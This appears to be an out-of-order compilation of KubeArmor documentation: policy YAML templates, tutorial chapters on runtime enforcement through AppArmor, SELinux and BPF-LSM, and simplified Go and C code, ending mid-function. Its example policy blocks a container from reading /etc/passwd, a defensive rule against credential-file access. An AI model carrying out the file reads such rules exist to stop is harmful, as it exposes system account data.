tags: ["tag", ...] # --> optional
message: [message] # --> optional
nodeSelector:
matchLabels:
[key1]: [value1]
[keyN]: [valueN]
process:
matchPaths:
- path: [absolute executable path]
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute executable path]
matchDirectories:
- dir: [absolute directory path]
recursive: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute executable path]
matchPatterns:
- pattern: [regex pattern]
ownerOnly: [true|false] # --> optional
file:
matchPaths:
- path: [absolute file path]
readOnly: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute executable path]
matchDirectories:
- dir: [absolute directory path]
recursive: [true|false] # --> optional
readOnly: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute executable path]
matchPatterns:
- pattern: [regex pattern]
readOnly: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
network:
matchProtocols:
- protocol: [TCP|tcp|UDP|udp|ICMP|icmp]
fromSource:
- path: [absolute executable path]
capabilities:
matchCapabilities:
- capability: [capability name]
fromSource:
- path: [absolute executable path]
action: [Audit|Block] (Block by default)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorHostPolicy
metadata:
name: [policy name]
severity: [1-10]
tags: ["tag1", ..., "tagN"]
message: [message]
nodeSelector:
matchLabels:
[key1]: [value1]
[keyN]: [valueN]
kubernetes.io/arch: [architecture, (e.g., amd64)]
kubernetes.io/hostname: [host name, (e.g., kubearmor-dev)]
kubernetes.io/os: [operating system, (e.g., linux)]
process:
matchPaths:
- path: [absolute executable path]
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute executable path]
matchDirectories:
- dir: [absolute directory path]
recursive: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute executable path]
matchPatterns:
- pattern: [regex pattern]
ownerOnly: [true|false] # --> optional
process:
matchPaths:
- path: /bin/sleep
fromSource:
- path: /bin/bash
file:
matchPaths:
- path: [absolute file path]
readOnly: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute file path]
matchDirectories:
- dir: [absolute directory path]
recursive: [true|false] # --> optional
readOnly: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute file path]
matchPatterns:
- pattern: [regex pattern]
readOnly: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
network:
matchProtocols:
- protocol: [protocol(,)] # --> [ TCP | tcp | UDP | udp | ICMP | icmp ]
fromSource:
- path: [absolute file path]
capabilities:
matchCapabilities:
- capability: [capability name(,)]
fromSource:
- path: [absolute file path]
syscalls:
matchSyscalls:
- syscall:
- syscallX
- syscallY
fromSource: # --> optional
- path: [absolute executable path]
- dir: [absolute directory path]
recursive: [true|false] # --> optional
matchPaths:
- path: [absolute directory path | absolute executable path]
recursive: [true|false] # --> optional
- syscall:
- syscallX
- syscallY
fromSource: # --> optional
- path: [absolute executable path]
- dir: [absolute directory path]
recursive: [true|false] # --> optional
process:
matchPaths:
- path: /bin/sleep
- syscall:
- unlink
fromSource:
- path: /bin/bash
action: [Audit|Block]
action: [Allow|Audit|Block]
// KubeArmor/BPF/shared.h (Simplified)
typedef struct {
u64 ts; // Timestamp
u32 pid_id; // PID Namespace ID
u32 mnt_id; // Mount Namespace ID
// ... other process IDs (host/container) and UID ...
u32 event_id; // Identifier for the type of event (e.g., file open, process exec)
s64 retval; // Return value of the syscall (useful for blocked actions)
u8 comm[TASK_COMM_LEN]; // Process command name
bufs_k data; // Structure potentially holding file path, source process path
u64 exec_id; // Identifier for exec events
} event;
struct {
__uint(type, BPF_MAP_TYPE_RINGBUF); // The type of map used for kernel-to-userspace communication
__uint(max_entries, 1 << 24);
__uint(pinning, LIBBPF_PIN_BY_NAME);
} kubearmor_events SEC(".maps"); // This is the ring buffer map
// KubeArmor/monitor/systemMonitor.go (Simplified)
// SystemMonitor Structure (partially shown)
type SystemMonitor struct {
// ... other fields ...
// system events
SyscallChannel chan []byte // Channel to receive raw event data
SyscallPerfMap *perf.Reader // Reads from the eBPF ring buffer
// PidID + MntID -> container id map (from Container/Node Identity)
NsMap map[NsKey]string
NsMapLock *sync.RWMutex
// context + args
ContextChan chan ContextCombined // Channel to send processed events
// ... other fields ...
}
// TraceSyscall Function (Simplified)
func (mon *SystemMonitor) TraceSyscall() {
if mon.SyscallPerfMap != nil {
// Goroutine to read from the perf buffer (ring buffer)
go func() {
for {
record, err := mon.SyscallPerfMap.Read() // Read raw event data from the ring buffer
if err != nil {
// ... error handling ...
return
}
// Send raw data to the processing channel
mon.SyscallChannel <- record.RawSample
}
}()
} else {
// ... log error ...
return
}
// Goroutine to process events from the channel
for {
select {
case <-StopChan:
return // Exit when told to stop
case dataRaw, valid := <-mon.SyscallChannel: // Receive raw event data
if !valid {
continue
}
// Read the raw data into the SyscallContext struct
dataBuff := bytes.NewBuffer(dataRaw)
ctx, err := readContextFromBuff(dataBuff) // Helper to parse raw bytes
if err != nil {
// ... handle parse error ...
continue
}
// Get argument data (file path, network address, etc.)
args, err := GetArgs(dataBuff, ctx.Argnum) // Helper to parse arguments
if err != nil {
// ... handle args error ...
continue
}
containerID := ""
if ctx.PidID != 0 && ctx.MntID != 0 {
// Use Namespace IDs from the event to look up Container ID in NsMap
containerID = mon.LookupContainerID(ctx.PidID, ctx.MntID) // This uses the map from Chapter 2 context
}
// If lookup failed and it's a container NS, maybe replay (simplified out)
// If it's host (PidID/MntID 0) or lookup succeeded...
// Push the combined context (with ContainerID) to another channel for logging/policy processing
mon.ContextChan <- ContextCombined{ContainerID: containerID, ContextSys: ctx, ContextArgs: args}
}
}
}
// LookupContainerID Function (from monitor/processTree.go - shown in Chapter 2 context)
func (mon *SystemMonitor) LookupContainerID(pidns, mntns uint32) string {
// ... implementation using NsMap map ...
// This is where the correlation happens: Namespace IDs -> Container ID
}
// ContextCombined Structure (from monitor/systemMonitor.go)
type ContextCombined struct {
ContainerID string // Added context from lookup
ContextSys SyscallContext // Raw data from eBPF
ContextArgs []interface{} // Parsed arguments from raw data
}
| Event Type | Examples | Kernel Hooks Used |
| --- | --- | --- |
| Process | Process execution (execve, execveat), process exit (do_exit), privilege changes (setuid, setgid) | Tracepoints, Kprobes, BPF-LSM |
| File | File open (open, openat), delete (unlink, unlinkat, rmdir), change owner (chown, fchownat) | Kprobes, Tracepoints, BPF-LSM |
| Network | Socket creation (socket), connection attempts (connect), accepting connections (accept), binding addresses (bind), listening on sockets (listen) | Kprobes, Tracepoints, BPF-LSM |
| Capability | Use of privileged kernel features (capabilities) | BPF-LSM, Kprobes |
| Syscall | General system call entry/exit for various calls | Kprobes, Tracepoints |
Here is the specification of a security policy.
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: [policy name]
namespace: [namespace name]
spec:
severity: [1-10] # --> optional
tags: ["tag", ...] # --> optional
message: [message] # --> optional
selector:
matchLabels:
[key1]: [value1]
[keyN]: [valueN]
matchExpressions:
- key: [label]
operator: [In|NotIn]
values:
- [labels]
process:
matchPaths:
- path: [absolute executable path]
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute executable path]
matchDirectories:
- dir: [absolute directory path]
recursive: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute executable path]
matchPatterns:
- pattern: [regex pattern]
ownerOnly: [true|false] # --> optional
file:
matchPaths:
- path: [absolute file path]
readOnly: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute executable path]
matchDirectories:
- dir: [absolute directory path]
recursive: [true|false] # --> optional
readOnly: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute executable path]
matchPatterns:
- pattern: [regex pattern]
readOnly: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
network:
matchProtocols:
- protocol: [TCP|tcp|UDP|udp|ICMP|icmp]
fromSource: # --> optional
- path: [absolute executable path]
capabilities:
matchCapabilities:
- capability: [capability name]
fromSource: # --> optional
- path: [absolute executable path]
syscalls:
matchSyscalls:
- syscall:
- syscallX
- syscallY
fromSource: # --> optional
- path: [absolute executable path]
- dir: [absolute directory path]
recursive: [true|false] # --> optional
matchPaths:
- path: [absolute directory path | absolute executable path]
recursive: [true|false] # --> optional
- syscall:
- syscallX
- syscallY
fromSource: # --> optional
- path: [absolute executable path]
- dir: [absolute directory path]
recursive: [true|false] # --> optional
action: [Allow|Audit|Block] (Block by default)
Note: For system call monitoring, only the audit action is supported, regardless of the value of action.
For better understanding, you can check the KubeArmorPolicy spec diagram.
Now, we will briefly explain how to define a security policy.
A security policy starts with the base information such as apiVersion, kind, and metadata. The apiVersion and kind would be the same in any security policies. In the case of metadata, you need to specify the names of a policy and a namespace where you want to apply the policy.
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: [policy name]
namespace: [namespace name]
The severity part is somewhat important. You can specify the severity of a given policy from 1 to 10. This severity will appear in alerts when policy violations happen.
severity: [1-10]
The tags part is optional. You can define multiple tags (e.g., WARNING, SENSITIVE, MITRE, STIG, etc.) to categorize security policies.
tags: ["tag1", ..., "tagN"]
The message part is optional. You can add an alert message, and then the message will be presented in alert logs.
message: [message]
The selector part is relatively straightforward. Similar to other Kubernetes configurations, you can specify (a group of) pods based on labels.
selector:
matchLabels:
[key1]: [value1]
[keyN]: [valueN]
Further, in selector we can use matchExpressions to define labels that select or deselect workloads. Currently, only labels can be matched, so the key should be 'label'. The operator determines whether the policy applies to the workloads specified in the values field or not.
Operator: In. When the operator is set to In, the policy is applied only to the workloads that match the labels in the values field.
Operator: NotIn. When the operator is set to NotIn, the policy is applied to all workloads except those that match the labels in the values field.
selector:
matchExpressions:
- key: label
operator: [In|NotIn]
values:
- [label] # string format eg. -> (app=nginx)
NOTE: matchExpressions and matchLabels are ANDed together; a workload must satisfy both to be selected.
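As a sketch of how the two selector forms combine (the labels shown are assumptions for illustration):

```yaml
selector:
  matchLabels:
    tier: backend              # assumed label
  matchExpressions:
  - key: label
    operator: NotIn
    values:
    - app=nginx                # assumed label value
```

Because the two forms are ANDed, this selector targets workloads labeled tier: backend except those that also carry app=nginx.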
In the process section, there are three types of matches: matchPaths, matchDirectories, and matchPatterns. You can define specific executables using matchPaths or all executables in specific directories using matchDirectories. In the case of matchPatterns, advanced operators may be able to determine particular patterns for executables by using regular expressions. However, the coverage of regular expressions is highly dependent on AppArmor (Policy Core Reference). Thus, we generally do not recommend using this match.
process:
matchPaths:
- path: [absolute executable path]
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute executable path]
matchDirectories:
- dir: [absolute directory path]
recursive: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute executable path]
matchPatterns:
- pattern: [regex pattern]
ownerOnly: [true|false] # --> optional
In each match, there are three options.
ownerOnly (static action: allow owner only; otherwise block all)
If this is enabled, only the owners of the executable(s) defined with matchPaths and matchDirectories will be allowed to execute them.
recursive
If this is enabled, the coverage will extend to the subdirectories of the directory defined with matchDirectories.
fromSource
If a path is specified in fromSource, the executable at the path will be allowed/blocked to execute the executables defined with matchPaths or matchDirectories. For better understanding, let us say that an operator defines a policy as follows. Then, /bin/bash will be only allowed (blocked) to execute /bin/sleep. Otherwise, the execution of /bin/sleep will be blocked (allowed).
process:
matchPaths:
- path: /bin/sleep
fromSource:
- path: /bin/bash
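Wrapped into a complete policy, the snippet above could look like the following sketch; the namespace and selector label are assumptions chosen for illustration.

```yaml
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: ksp-sleep-from-bash          # illustrative name
  namespace: default
spec:
  selector:
    matchLabels:
      app: my-web-app                # assumed label
  process:
    matchPaths:
    - path: /bin/sleep
      fromSource:
      - path: /bin/bash
  action: Block                      # /bin/bash is prevented from executing /bin/sleep; other parents are unaffected
```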
The file section is quite similar to the process section.
file:
matchPaths:
- path: [absolute file path]
readOnly: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute file path]
matchDirectories:
- dir: [absolute directory path]
recursive: [true|false] # --> optional
readOnly: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
fromSource: # --> optional
- path: [absolute file path]
matchPatterns:
- pattern: [regex pattern]
readOnly: [true|false] # --> optional
ownerOnly: [true|false] # --> optional
The only difference between 'process' and 'file' is the readOnly option.
readOnly (static action: allow to read only; otherwise block all)
If this is enabled, only the read operation will be allowed, and any other operations (e.g., write) will be blocked.
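For example, the following sketch (the selector label and directory are assumptions) leaves reads under /etc/nginx/ untouched while blocking writes:

```yaml
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: ksp-readonly-nginx-config    # illustrative name
  namespace: default
spec:
  selector:
    matchLabels:
      app: my-web-app                # assumed label
  file:
    matchDirectories:
    - dir: /etc/nginx/               # assumed directory
      recursive: true
      readOnly: true                 # reads allowed; non-read operations are blocked
  action: Block
```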
In the case of network, there is currently one match type: matchProtocols. You can define specific protocols among TCP, UDP, and ICMP.
network:
matchProtocols:
- protocol: [protocol] # --> [ TCP | tcp | UDP | udp | ICMP | icmp ]
fromSource: # --> optional
- path: [absolute file path]
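A small sketch of this match (the source binary is an assumption): combined with action: Audit, it would record ICMP traffic generated by /usr/bin/ping.

```yaml
network:
  matchProtocols:
  - protocol: icmp
    fromSource:
    - path: /usr/bin/ping            # assumed source binary
```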
In the case of capabilities, there is currently one match type: matchCapabilities. You can define specific capability names to allow or block using matchCapabilities. You can check available capabilities in Capability List.
capabilities:
matchCapabilities:
- capability: [capability name]
fromSource: # --> optional
- path: [absolute file path]
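For instance, the following sketch (the source binary is an assumption) targets the net_raw capability, which raw-socket tools such as ping rely on:

```yaml
capabilities:
  matchCapabilities:
  - capability: net_raw
    fromSource:
    - path: /usr/bin/ping            # assumed source binary; omit fromSource to match all sources
```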
In the case of syscalls, there are two types of matches: matchSyscalls and matchPaths. matchPaths can be used to target system calls that operate on a specific binary path or on anything under a specific directory; additionally, you can slice the results by the syscalls generated by a binary or by a group of binaries in a directory. You can use matchSyscalls as a more general rule to match syscalls from all sources or from specific binaries.
syscalls:
matchSyscalls:
- syscall:
- syscallX
- syscallY
fromSource: # --> optional
- path: [absolute executable path]
- dir: [absolute directory path]
recursive: [true|false] # --> optional
matchPaths:
- path: [absolute directory path | absolute executable path]
recursive: [true|false] # --> optional
- syscall:
- syscallX
- syscallY
fromSource: # --> optional
- path: [absolute executable path]
- dir: [absolute directory path]
recursive: [true|false] # --> optional
There are two options in each match.
fromSource
If a path is specified in fromSource, KubeArmor will match only syscalls generated by the defined source. For a better understanding, let's take the example below: only unlink system calls generated by /bin/bash will be matched.
process:
matchPaths:
- path: /bin/sleep
- syscall:
- unlink
fromSource:
- path: /bin/bash
recursive
If this is enabled, the coverage will extend to the subdirectories of the directory.
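A sketch combining both options (the directory is an assumption): match rmdir syscalls generated by any binary under /usr/local/bin, including its subdirectories.

```yaml
syscalls:
  matchSyscalls:
  - syscall:
    - rmdir
    fromSource:
    - dir: /usr/local/bin/           # assumed directory
      recursive: true                # also cover binaries in subdirectories
```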
Action
The action can be Allow, Audit, or Block. Depending on the action, security policies are handled in a blacklist or a whitelist manner, so you need to choose the action carefully. You can refer to Consideration in Policy Action for more details. The Audit action can be used to verify a policy before applying it with the Block action. For system call monitoring, only audit mode is supported regardless of the action.
action: [Allow|Audit|Block]
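Putting the sections together, here is a minimal end-to-end sketch; the name, namespace, label, and paths are assumptions chosen for illustration. It blocks execution of the package managers and writes under /etc/ for the selected pods.

```yaml
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: ksp-block-pkg-mgmt           # illustrative name
  namespace: default
spec:
  severity: 7
  tags: ["CIS"]
  message: "package manager execution or /etc write blocked"
  selector:
    matchLabels:
      app: my-web-app                # assumed label
  process:
    matchPaths:
    - path: /usr/bin/apt
    - path: /usr/bin/apt-get
  file:
    matchDirectories:
    - dir: /etc/
      recursive: true
      readOnly: true                 # writes under /etc/ are blocked, reads still allowed
  action: Block
```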
Welcome back! In the previous chapter, we learned how KubeArmor figures out who is performing an action on your system by understanding Container/Node Identity. We saw how it maps low-level system details like Namespace IDs to higher-level concepts like Pods, containers, and nodes, using information from the Kubernetes API and the container runtime.
Now that KubeArmor knows who is doing something, it needs to decide if that action is allowed. This is the job of the Runtime Enforcer.
Think of the Runtime Enforcer as the actual security guard positioned at the gates and doors of your system. It receives the security rules you defined in your Security Policies (KSP, HSP, CSP). But applications and the operating system don't directly understand KubeArmor policy YAML!
The Runtime Enforcer's main task is to translate these high-level KubeArmor rules into instructions that the underlying operating system's built-in security features can understand and enforce. These OS security features are powerful mechanisms within the Linux kernel designed to control what processes can and cannot do. Common examples include:
AppArmor: Used by distributions like Ubuntu, Debian, and SLES. It uses security profiles that define access controls for individual programs (processes).
SELinux: Used by distributions like Fedora, CentOS/RHEL, and Alpine Linux. It uses a system of labels and rules to control interactions between processes and system resources.
BPF-LSM: A newer mechanism using eBPF programs attached to Linux Security Module (LSM) hooks to enforce security policies directly within the kernel.
When an application or process on your node or inside a container attempts to do something (like open a file, start a new process, or make a network connection), the Runtime Enforcer (via the configured OS security feature) steps in. It checks the translated rules that apply to the identified workload and tells the operating system whether to Allow, Audit, or Block the action.
Let's go back to our example: preventing a web server container (with the label app: my-web-app) from reading /etc/passwd.
In Chapter 1, we wrote a KubeArmor Policy for this:
In Chapter 2, we saw how KubeArmor's Container/Node Identity component identifies that a specific process trying to read /etc/passwd belongs to a container running in a Pod with the label app: my-web-app.
Now, the Runtime Enforcer takes over:
It knows the action is "read file /etc/passwd".
It knows the actor is the container identified as having the label app: my-web-app.
It looks up the applicable policies for this actor and action.
It finds the block-etc-passwd-read policy, which says action: Block for /etc/passwd.
The Runtime Enforcer, using the underlying OS security module, tells the Linux kernel to Block the read attempt.
The application trying to read the file will receive a "Permission denied" error, and the attempt will be stopped before it can succeed.
KubeArmor is designed to be flexible and work on different Linux systems. It doesn't assume a specific OS security module is available. When KubeArmor starts on a node, it checks which security modules are enabled and supported on that particular system.
You can configure KubeArmor to prefer one enforcer over another using the lsm.lsmOrder configuration option. KubeArmor will try to initialize the enforcers in the specified order (bpf, selinux, apparmor) and use the first one that is available and successfully initialized. If none of the preferred ones are available, it falls back to any other supported, available LSM. If no supported enforcer can be initialized, KubeArmor will run in a limited capacity (primarily for monitoring, not enforcement).
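If you install via Helm, the preference could be expressed roughly as below. The exact key layout is an assumption inferred from the lsm.lsmOrder option named above, so verify it against the chart's values.yaml before use.

```yaml
# values.yaml (sketch; key names assumed from the lsm.lsmOrder option above)
lsm:
  lsmOrder: "bpf,apparmor,selinux"   # try BPF-LSM first, then AppArmor, then SELinux
```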
You can see KubeArmor selecting the LSM in the NewRuntimeEnforcer function (from KubeArmor/enforcer/runtimeEnforcer.go):
This snippet shows that KubeArmor checks for available LSMs (lsms) and attempts to initialize the corresponding enforcer module (be.NewBPFEnforcer, NewAppArmorEnforcer, NewSELinuxEnforcer) based on configuration and availability. The first one that succeeds becomes the active EnforcerType.
Once an enforcer is selected and initialized, the KubeArmor Daemon on the node loads the relevant policies for the workloads it is protecting and translates them into the specific rules required by the chosen enforcer.
When KubeArmor needs to enforce a policy on a specific container or node, here's a simplified flow:
Policy Change/Discovery: A KubeArmor Policy (KSP, HSP, or CSP) is applied or changed via the Kubernetes API. The KubeArmor Daemon on the relevant node detects this.
Identify Affected Workloads: The daemon determines which specific containers or the host node are targeted by this policy change using the selectors and its internal Container/Node Identity mapping.
Translate Rules: For each affected workload, the daemon takes the high-level policy rules (e.g., Block access to /etc/passwd) and translates them into the low-level format required by the active Runtime Enforcer (AppArmor, SELinux, or BPF-LSM).
Load Rules into OS: The daemon interacts with the operating system to load or update these translated rules. This might involve writing files, calling system utilities (apparmor_parser, chcon), or interacting with BPF system calls and maps.
OS Enforcer Takes Over: The OS kernel's security module (now configured by KubeArmor) is now active.
Action Attempt: A process within the protected workload attempts a specific action (e.g., opening /etc/passwd).
Interception: The OS kernel intercepts this action using hooks provided by its security module.
Decision: The security module checks the rules previously loaded by KubeArmor that apply to the process and resource involved. Based on the action (Allow, Audit, Block) defined in the KubeArmor policy (and translated into the module's format), the security module makes a decision.
Enforcement:
If Block, the OS prevents the action and returns an error to the process.
If Allow, the OS permits the action.
If Audit, the OS permits the action but generates a log event.
Event Notification (for Audit/Block): (As we'll see in the next chapter), the OS kernel generates an event notification for blocked or audited actions, which KubeArmor then collects for logging and alerting.
Here's a simplified sequence diagram for the enforcement path after policies are loaded:
This diagram shows that the actual enforcement decision happens deep within the OS kernel, powered by the rules that KubeArmor translated and loaded. KubeArmor isn't in the critical path for every action attempt; it pre-configures the kernel's security features to handle the enforcement directly.
Let's see how KubeArmor interacts with the different OS enforcers.
AppArmor Enforcer:
AppArmor uses text-based profile files, typically stored in /etc/apparmor.d/. KubeArmor translates its policies into rules written in AppArmor's profile language, saves them to a file, and then uses the apparmor_parser command-line tool to load or update these profiles in the kernel.
This snippet shows the key steps: generating the profile content, writing it to a file path based on the container/profile name, and then executing the apparmor_parser command with the -r (reload) and -W (wait) flags to apply the profile to the kernel.
SELinux Enforcer:
SELinux policy management is complex, often involving compiling policy modules and managing file contexts. KubeArmor's SELinux enforcer focuses primarily on basic host policy enforcement (in standalone mode, not typically in Kubernetes clusters using the default SELinux integration). It interacts with tools like chcon to set file security contexts based on policies.
This snippet shows KubeArmor executing the chcon command to modify the SELinux security context (label) of files, which is a key way SELinux enforces access control.
BPF-LSM Enforcer:
The BPF-LSM enforcer works differently. Instead of writing text files and using external tools, it loads eBPF programs directly into the kernel and populates eBPF maps with rule data. When an event occurs, the eBPF program attached to the relevant LSM hook checks the rules stored in the map to make the enforcement decision.
This heavily simplified snippet shows how the BPF enforcer loads BPF programs and attaches them to kernel LSM hooks. It also hints at how container identity (Container/Node Identity) is used (via pidns, mntns) as a key to organize rules within BPF maps (BPFContainerMap), allowing the kernel's BPF program to quickly look up the relevant policy when an event occurs. The AddContainerIDToMap function, although simplified, demonstrates how KubeArmor populates these maps.
Each enforcer type requires specific logic within KubeArmor to translate policies and interact with the OS. The Runtime Enforcer component provides this abstraction layer, allowing KubeArmor policies to be enforced regardless of the underlying Linux security module, as long as it's supported.
The action specified in your KubeArmor policy (Security Policies) directly maps to how the Runtime Enforcer instructs the OS:
Allow: The translated rule explicitly permits the action. The OS security module will let the action proceed.
Audit: The translated rule allows the action but is configured to generate a log event. The OS security module lets the action proceed and notifies the kernel's logging system.
Block: The translated rule denies the action. The OS security module intercepts the action and prevents it from completing, typically returning an error to the application.
This allows you to use KubeArmor policies not just for strict enforcement but also for visibility and testing (Audit).
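A common workflow this enables: ship the rule with action: Audit first, review the resulting alerts, and only then switch it to Block. A sketch based on the /etc/passwd example from this chapter:

```yaml
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: audit-etc-passwd-read        # illustrative name
  namespace: default
spec:
  selector:
    matchLabels:
      app: my-web-app
  file:
    matchPaths:
    - path: /etc/passwd
  action: Audit                      # observe accesses first; change to Block once verified
```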
The Runtime Enforcer is the critical piece that translates your human-readable KubeArmor policies into the low-level language understood by the operating system's security features (AppArmor, SELinux, BPF-LSM). It's responsible for loading these translated rules into the kernel, enabling the OS to intercept and enforce your desired security posture for containers and host processes based on their identity.
By selecting the appropriate enforcer for your system and dynamically updating its rules, KubeArmor ensures that your security policies are actively enforced at runtime. In the next chapter, we'll look at the other side of runtime security: observing system events, including those that were audited or blocked by the Runtime Enforcer.
# simplified KSP
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: block-etc-passwd-read
namespace: default
spec:
selector:
matchLabels:
app: my-web-app # Policy applies to containers/pods with this label
file:
matchPaths:
- path: /etc/passwd # Specific file to protect
# No readOnly specified means all access types are subject to 'action'
action: Block # What to do if the rule is violated
// KubeArmor/enforcer/runtimeEnforcer.go (Simplified)
func NewRuntimeEnforcer(node tp.Node, pinpath string, logger *fd.Feeder, monitor *mon.SystemMonitor) *RuntimeEnforcer {
// ... code to check available LSMs on the system ...
// This selectLsm function tries to find and initialize the best available enforcer
return selectLsm(re, cfg.GlobalCfg.LsmOrder, availablelsms, lsms, node, pinpath, logger, monitor)
}
// selectLsm Function (Simplified logic)
func selectLsm(re *RuntimeEnforcer, lsmOrder, availablelsms, supportedlsm []string, node tp.Node, pinpath string, logger *fd.Feeder, monitor *mon.SystemMonitor) *RuntimeEnforcer {
// Try LSMs in preferred order first
// If preferred fails or is not available, try others
if kl.ContainsElement(supportedlsm, "bpf") && kl.ContainsElement(availablelsms, "bpf") {
// Attempt to initialize BPFEnforcer
re.bpfEnforcer, err = be.NewBPFEnforcer(...)
if re.bpfEnforcer != nil {
re.EnforcerType = "BPFLSM"
// Success, return BPF enforcer
return re
}
// BPF failed, try next...
}
if kl.ContainsElement(supportedlsm, "apparmor") && kl.ContainsElement(availablelsms, "apparmor") {
// Attempt to initialize AppArmorEnforcer
re.appArmorEnforcer = NewAppArmorEnforcer(...)
if re.appArmorEnforcer != nil {
re.EnforcerType = "AppArmor"
// Success, return AppArmor enforcer
return re
}
// AppArmor failed, try next...
}
if !kl.IsInK8sCluster() && kl.ContainsElement(supportedlsm, "selinux") && kl.ContainsElement(availablelsms, "selinux") {
// Attempt to initialize SELinuxEnforcer (only for host policies outside K8s)
re.seLinuxEnforcer = NewSELinuxEnforcer(...)
if re.seLinuxEnforcer != nil {
re.EnforcerType = "SELinux"
// Success, return SELinux enforcer
return re
}
// SELinux failed, try next...
}
// No supported/available enforcer found
return nil
}
// KubeArmor/enforcer/appArmorEnforcer.go (Simplified)
// UpdateAppArmorProfile Function
func (ae *AppArmorEnforcer) UpdateAppArmorProfile(endPoint tp.EndPoint, appArmorProfile string, securityPolicies []tp.SecurityPolicy) {
// ... code to generate the AppArmor profile string based on KubeArmor policies ...
// This involves iterating through securityPolicies and converting them to AppArmor rules
newProfileContent := "## == Managed by KubeArmor == ##\n...\n" // generated content
// Write the generated profile to a file
newfile, err := os.Create(filepath.Clean("/etc/apparmor.d/" + appArmorProfile))
// ... error handling ...
_, err = newfile.WriteString(newProfileContent)
// ... error handling and file closing ...
// Load/reload the profile into the kernel using apparmor_parser
if err := kl.RunCommandAndWaitWithErr("apparmor_parser", []string{"-r", "-W", "/etc/apparmor.d/" + appArmorProfile}); err != nil {
// Log error if loading fails
ae.Logger.Warnf("Unable to update ... (%s)", err.Error())
return
}
ae.Logger.Printf("Updated security rule(s) to %s/%s", endPoint.EndPointName, appArmorProfile)
}
// KubeArmor/enforcer/SELinuxEnforcer.go (Simplified)
// UpdateSELinuxLabels Function
func (se *SELinuxEnforcer) UpdateSELinuxLabels(profilePath string) bool {
// ... code to read translated policy rules from a file ...
// The file contains rules like "SubjectLabel SubjectPath ObjectLabel ObjectPath ..."
res := true
// Iterate through rules from the profile file
for _, line := range strings.Split(string(profile), "\n") {
words := strings.Fields(line)
if len(words) != 7 { continue }
subjectLabel := words[0]
subjectPath := words[1]
objectLabel := words[2]
objectPath := words[3]
// Example: Change the label of a file/directory using chcon
if subjectLabel == "-" { // Rule doesn't specify subject path label
if err := kl.RunCommandAndWaitWithErr("chcon", []string{"-t", objectLabel, objectPath}); err != nil {
// Log error if chcon fails
se.Logger.Warnf("Unable to update the SELinux label (%s) of %s (%s)", objectLabel, objectPath, err.Error())
res = false
}
} else { // Rule specifies both subject and object path labels
if err := kl.RunCommandAndWaitWithErr("chcon", []string{"-t", subjectLabel, subjectPath}); err != nil {
se.Logger.Warnf("Unable to update the SELinux label (%s) of %s (%s)", subjectLabel, subjectPath, err.Error())
res = false
}
if err := kl.RunCommandAndWaitWithErr("chcon", []string{"-t", objectLabel, objectPath}); err != nil {
se.Logger.Warnf("Unable to update the SELinux label (%s) of %s (%s)", objectLabel, objectPath, err.Error())
res = false
}
}
// ... handles directory and recursive options ...
}
return res
}
// KubeArmor/enforcer/bpflsm/enforcer.go (Simplified)
// NewBPFEnforcer instantiates the objects needed to set up BPF-LSM enforcement
func NewBPFEnforcer(node tp.Node, pinpath string, logger *fd.Feeder, monitor *mon.SystemMonitor) (*BPFEnforcer, error) {
// ... code to remove memory lock limits for BPF programs ...
// Load the BPF programs and maps compiled from the C code
if err := loadEnforcerObjects(&be.obj, &ebpf.CollectionOptions{
Maps: ebpf.MapOptions{PinPath: pinpath},
}); err != nil {
// Handle loading errors
be.Logger.Errf("error loading BPF LSM objects: %v", err)
return be, err
}
// Attach BPF programs to LSM hooks
// Example: Attach the 'EnforceProc' program to the 'security_bprm_check' LSM hook
be.Probes[be.obj.EnforceProc.String()], err = link.AttachLSM(link.LSMOptions{Program: be.obj.EnforceProc})
if err != nil {
// Handle attachment errors
be.Logger.Errf("opening lsm %s: %s", be.obj.EnforceProc.String(), err)
return be, err
}
// ... similarly attach other BPF programs for file, network, capabilities, etc. ...
// Get references to BPF maps (like the map storing rules per container)
be.BPFContainerMap = be.obj.KubearmorContainers // Renamed from be.obj.Maps.KubearmorContainers
// ... setup ring buffer for events (discussed in next chapter) ...
return be, nil
}
// AddContainerIDToMap Function (Example of populating a map with rules)
func (be *BPFEnforcer) AddContainerIDToMap(containerID string, pidns, mntns uint32) {
// ... code to get/generate rules for this container ...
// rulesData := generateBPFRules(containerID, policies)
// Look up or create the inner map for this container's rules
containerMapKey := NsKey{PidNS: pidns, MntNS: mntns} // Uses namespace IDs as the key for the outer map
// Update the BPF map with the container's rules or identity
// This would typically involve creating/getting a reference to an inner map
// and then populating that inner map with specific path -> rule mappings.
// For simplification, let's assume a direct mapping for identity:
containerMapValue := uint32(1) // Simplified: A value indicating the container is active
